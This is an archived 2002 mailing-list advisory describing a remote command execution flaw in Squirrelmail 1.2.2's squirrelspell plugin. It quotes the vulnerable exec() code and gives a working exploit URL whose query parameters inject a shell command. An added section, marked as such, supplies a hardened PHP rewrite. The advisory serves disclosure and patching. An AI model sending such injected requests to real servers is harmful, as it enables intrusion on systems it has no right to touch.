squirrelmail bug

From: appelastat_private
Date: Thu Jan 24 2002 - 07:55:57 PST


    Squirrelmail remote execute commands bug
    
    Version Affected :
    1.2.2
    
    Squirrelmail is a webmail system that allows users to send, receive and
    read mail. It supports themes, plugins etc. One of the plugins has a very
    interesting piece of code :
    
    from file check_me.mod.php :
    
    $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
    ...
    $floc = "$attachment_dir/$username_sqspell_data.txt";
    ...
    exec ("cat $floc | $sqspell_command", $sqspell_output);
    
    
    Everything looks fine, but where does this page include the config files
    that define $attachment_dir and the other variables? Answer: nowhere. So
    we can set the variables $sqspell_command and $floc ourselves. The
    result? We can execute any command, of course as the owner of the HTTP
    server process.
    
    Exploit :
    
    host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
    
    <appelastat_private>
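
Added example, not part of the original post and not Squirrelmail's own fix: a hardened sketch of the quoted logic, in which the checker table is passed in from server-side configuration, the requested key is checked against it, and the program is started without a shell. The function name sqspell_check(), the argv-style table and the 'cat' stand-in are assumptions; the root cause is assumed to be PHP's register_globals behaviour turning the query string into the variables the module never initialised.

```php
<?php
declare(strict_types=1);

// Added example; sqspell_check() and the sample config are hypothetical.
// $apps must come from server-side configuration, never from the request.
function sqspell_check(array $apps, string $useApp, string $text): array
{
    // The request may only pick a key; an unknown key is an error,
    // not an undefined variable the client gets to fill in.
    if (!array_key_exists($useApp, $apps)) {
        throw new InvalidArgumentException('unknown spell checker');
    }
    $argv = $apps[$useApp];                   // argv list, e.g. ['ispell', '-a']

    // Server-chosen temp file instead of a path built from request data.
    $tmp = tempnam(sys_get_temp_dir(), 'sqspell_');
    if ($tmp === false) {
        throw new RuntimeException('cannot create temp file');
    }
    file_put_contents($tmp, $text);
    try {
        // Array form of proc_open() (PHP >= 7.4) starts the program
        // directly, so no shell ever parses the command line.
        $spec = [0 => ['file', $tmp, 'r'], 1 => ['pipe', 'w']];
        $proc = proc_open($argv, $spec, $pipes);
        if (!is_resource($proc)) {
            throw new RuntimeException('cannot start spell checker');
        }
        $out = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        proc_close($proc);
    } finally {
        unlink($tmp);
    }
    return explode("\n", rtrim($out));
}

// Constructed demo config: 'cat' stands in for a real checker.
$SQSPELL_APP = ['demo' => ['cat']];
print_r(sqspell_check($SQSPELL_APP, 'demo', "helo wrld\n"));

try {
    // The key used in the request quoted above is not in the table.
    sqspell_check($SQSPELL_APP, 'blah', 'x');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Because the table and text are function arguments, requesting the file directly has nothing to populate; a module laid out like the one in the post would additionally need to refuse to run unless it was included by the plugin's entry point.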
    


